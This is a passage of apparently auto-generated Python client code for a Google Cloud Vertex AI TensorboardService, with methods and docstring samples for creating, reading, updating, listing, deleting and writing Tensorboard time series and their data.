# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.BatchCreateTensorboardTimeSeriesRequest
):
request = tensorboard_service.BatchCreateTensorboardTimeSeriesRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if requests is not None:
request.requests = requests
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.batch_create_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.CreateTensorboardTimeSeriesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
tensorboard_time_series: Optional[
gca_tensorboard_time_series.TensorboardTimeSeries
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_time_series.TensorboardTimeSeries:
r"""Creates a TensorboardTimeSeries.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_create_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard_time_series = aiplatform_v1.TensorboardTimeSeries()
tensorboard_time_series.display_name = "display_name_value"
tensorboard_time_series.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.CreateTensorboardTimeSeriesRequest(
parent="parent_value",
tensorboard_time_series=tensorboard_time_series,
)
# Make the request
response = client.create_tensorboard_time_series(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.CreateTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.CreateTensorboardTimeSeries].
parent (str):
Required. The resource name of the TensorboardRun to
create the TensorboardTimeSeries in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_time_series (google.cloud.aiplatform_v1.types.TensorboardTimeSeries):
Required. The TensorboardTimeSeries
to create.
This corresponds to the ``tensorboard_time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardTimeSeries:
TensorboardTimeSeries maps to times
series produced in training runs
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, tensorboard_time_series])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.CreateTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.CreateTensorboardTimeSeriesRequest
):
request = tensorboard_service.CreateTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if tensorboard_time_series is not None:
request.tensorboard_time_series = tensorboard_time_series
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.GetTensorboardTimeSeriesRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_time_series.TensorboardTimeSeries:
r"""Gets a TensorboardTimeSeries.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_get_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetTensorboardTimeSeriesRequest(
name="name_value",
)
# Make the request
response = client.get_tensorboard_time_series(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.GetTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.GetTensorboardTimeSeries].
name (str):
Required. The name of the TensorboardTimeSeries
resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardTimeSeries:
TensorboardTimeSeries maps to times
series produced in training runs
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.GetTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.GetTensorboardTimeSeriesRequest):
request = tensorboard_service.GetTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def update_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.UpdateTensorboardTimeSeriesRequest, dict]
] = None,
*,
tensorboard_time_series: Optional[
gca_tensorboard_time_series.TensorboardTimeSeries
] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_time_series.TensorboardTimeSeries:
r"""Updates a TensorboardTimeSeries.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_update_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard_time_series = aiplatform_v1.TensorboardTimeSeries()
tensorboard_time_series.display_name = "display_name_value"
tensorboard_time_series.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.UpdateTensorboardTimeSeriesRequest(
tensorboard_time_series=tensorboard_time_series,
)
# Make the request
response = client.update_tensorboard_time_series(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.UpdateTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.UpdateTensorboardTimeSeries].
tensorboard_time_series (google.cloud.aiplatform_v1.types.TensorboardTimeSeries):
Required. The TensorboardTimeSeries' ``name`` field is
used to identify the TensorboardTimeSeries to be
updated. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``tensorboard_time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Field mask is used to specify the fields to be
overwritten in the TensorboardTimeSeries resource by the
update. The fields specified in the update_mask are
relative to the resource, not the full request. A field
is overwritten if it's in the mask. If the user does not
provide a mask then all fields are overwritten if new
values are specified.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardTimeSeries:
TensorboardTimeSeries maps to times
series produced in training runs
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_time_series, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.UpdateTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.UpdateTensorboardTimeSeriesRequest
):
request = tensorboard_service.UpdateTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_time_series is not None:
request.tensorboard_time_series = tensorboard_time_series
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.update_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(
(
"tensorboard_time_series.name",
request.tensorboard_time_series.name,
),
)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def list_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.ListTensorboardTimeSeriesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTensorboardTimeSeriesPager:
r"""Lists TensorboardTimeSeries in a Location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_list_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListTensorboardTimeSeriesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_tensorboard_time_series(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.ListTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardTimeSeries].
parent (str):
Required. The resource name of the TensorboardRun to
list TensorboardTimeSeries. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ListTensorboardTimeSeriesPager:
Response message for
[TensorboardService.ListTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardTimeSeries].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ListTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.ListTensorboardTimeSeriesRequest
):
request = tensorboard_service.ListTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.list_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTensorboardTimeSeriesPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def delete_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.DeleteTensorboardTimeSeriesRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Deletes a TensorboardTimeSeries.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_delete_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteTensorboardTimeSeriesRequest(
name="name_value",
)
# Make the request
operation = client.delete_tensorboard_time_series(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.DeleteTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.DeleteTensorboardTimeSeries].
name (str):
Required. The name of the TensorboardTimeSeries to be
deleted. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.DeleteTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.DeleteTensorboardTimeSeriesRequest
):
request = tensorboard_service.DeleteTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
def batch_read_tensorboard_time_series_data(
self,
request: Optional[
Union[tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest, dict]
] = None,
*,
tensorboard: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.BatchReadTensorboardTimeSeriesDataResponse:
r"""Reads multiple TensorboardTimeSeries' data. The data
point number limit is 1000 for scalars, 100 for tensors
and blob references. If the number of data points stored
is less than the limit, all data is returned. Otherwise,
the number limit of data points is randomly selected
from this time series and returned.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_batch_read_tensorboard_time_series_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.BatchReadTensorboardTimeSeriesDataRequest(
tensorboard="tensorboard_value",
time_series=['time_series_value1', 'time_series_value2'],
)
# Make the request
response = client.batch_read_tensorboard_time_series_data(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.BatchReadTensorboardTimeSeriesDataRequest, dict]):
The request object. Request message for
[TensorboardService.BatchReadTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.BatchReadTensorboardTimeSeriesData].
tensorboard (str):
Required. The resource name of the Tensorboard
containing TensorboardTimeSeries to read data from.
Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``.
The TensorboardTimeSeries referenced by
[time_series][google.cloud.aiplatform.v1.BatchReadTensorboardTimeSeriesDataRequest.time_series]
must be sub resources of this Tensorboard.
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.BatchReadTensorboardTimeSeriesDataResponse:
Response message for
[TensorboardService.BatchReadTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.BatchReadTensorboardTimeSeriesData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest
):
request = tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard is not None:
request.tensorboard = tensorboard
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.batch_read_tensorboard_time_series_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard", request.tensorboard),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def read_tensorboard_time_series_data(
self,
request: Optional[
Union[tensorboard_service.ReadTensorboardTimeSeriesDataRequest, dict]
] = None,
*,
tensorboard_time_series: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.ReadTensorboardTimeSeriesDataResponse:
r"""Reads a TensorboardTimeSeries' data. By default, if the number
of data points stored is less than 1000, all data is returned.
Otherwise, 1000 data points is randomly selected from this time
series and returned. This value can be changed by changing
max_data_points, which can't be greater than 10k.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_read_tensorboard_time_series_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ReadTensorboardTimeSeriesDataRequest(
tensorboard_time_series="tensorboard_time_series_value",
)
# Make the request
response = client.read_tensorboard_time_series_data(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ReadTensorboardTimeSeriesDataRequest, dict]):
The request object. Request message for
[TensorboardService.ReadTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardTimeSeriesData].
tensorboard_time_series (str):
Required. The resource name of the TensorboardTimeSeries
to read data from. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``tensorboard_time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.ReadTensorboardTimeSeriesDataResponse:
Response message for
[TensorboardService.ReadTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardTimeSeriesData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_time_series])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ReadTensorboardTimeSeriesDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.ReadTensorboardTimeSeriesDataRequest
):
request = tensorboard_service.ReadTensorboardTimeSeriesDataRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_time_series is not None:
request.tensorboard_time_series = tensorboard_time_series
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.read_tensorboard_time_series_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_time_series", request.tensorboard_time_series),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def read_tensorboard_blob_data(
self,
request: Optional[
Union[tensorboard_service.ReadTensorboardBlobDataRequest, dict]
] = None,
*,
time_series: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[tensorboard_service.ReadTensorboardBlobDataResponse]:
r"""Gets bytes of TensorboardBlobs.
This is to allow reading blob data stored in consumer
project's Cloud Storage bucket without users having to
obtain Cloud Storage access permission.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_read_tensorboard_blob_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ReadTensorboardBlobDataRequest(
time_series="time_series_value",
)
# Make the request
stream = client.read_tensorboard_blob_data(request=request)
# Handle the response
for response in stream:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ReadTensorboardBlobDataRequest, dict]):
The request object. Request message for
[TensorboardService.ReadTensorboardBlobData][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardBlobData].
time_series (str):
Required. The resource name of the TensorboardTimeSeries
to list Blobs. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.aiplatform_v1.types.ReadTensorboardBlobDataResponse]:
Response message for
[TensorboardService.ReadTensorboardBlobData][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardBlobData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([time_series])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ReadTensorboardBlobDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ReadTensorboardBlobDataRequest):
request = tensorboard_service.ReadTensorboardBlobDataRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if time_series is not None:
request.time_series = time_series
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.read_tensorboard_blob_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("time_series", request.time_series),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def write_tensorboard_experiment_data(
self,
request: Optional[
Union[tensorboard_service.WriteTensorboardExperimentDataRequest, dict]
] = None,
*,
tensorboard_experiment: Optional[str] = None,
write_run_data_requests: Optional[
MutableSequence[tensorboard_service.WriteTensorboardRunDataRequest]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.WriteTensorboardExperimentDataResponse:
r"""Write time series data points of multiple
TensorboardTimeSeries in multiple TensorboardRun's. If
any data fail to be ingested, an error is returned.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_write_tensorboard_experiment_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
write_run_data_requests = aiplatform_v1.WriteTensorboardRunDataRequest()
write_run_data_requests.tensorboard_run = "tensorboard_run_value"
write_run_data_requests.time_series_data.tensorboard_time_series_id = "tensorboard_time_series_id_value"
write_run_data_requests.time_series_data.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.WriteTensorboardExperimentDataRequest(
tensorboard_experiment="tensorboard_experiment_value",
write_run_data_requests=write_run_data_requests,
)
# Make the request
response = client.write_tensorboard_experiment_data(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.WriteTensorboardExperimentDataRequest, dict]):
The request object. Request message for
[TensorboardService.WriteTensorboardExperimentData][google.cloud.aiplatform.v1.TensorboardService.WriteTensorboardExperimentData].
tensorboard_experiment (str):
Required. The resource name of the TensorboardExperiment
to write data to. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``tensorboard_experiment`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
write_run_data_requests (MutableSequence[google.cloud.aiplatform_v1.types.WriteTensorboardRunDataRequest]):
Required. Requests containing per-run
TensorboardTimeSeries data to write.
This corresponds to the ``write_run_data_requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.WriteTensorboardExperimentDataResponse:
Response message for
[TensorboardService.WriteTensorboardExperimentData][google.cloud.aiplatform.v1.TensorboardService.WriteTensorboardExperimentData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_experiment, write_run_data_requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
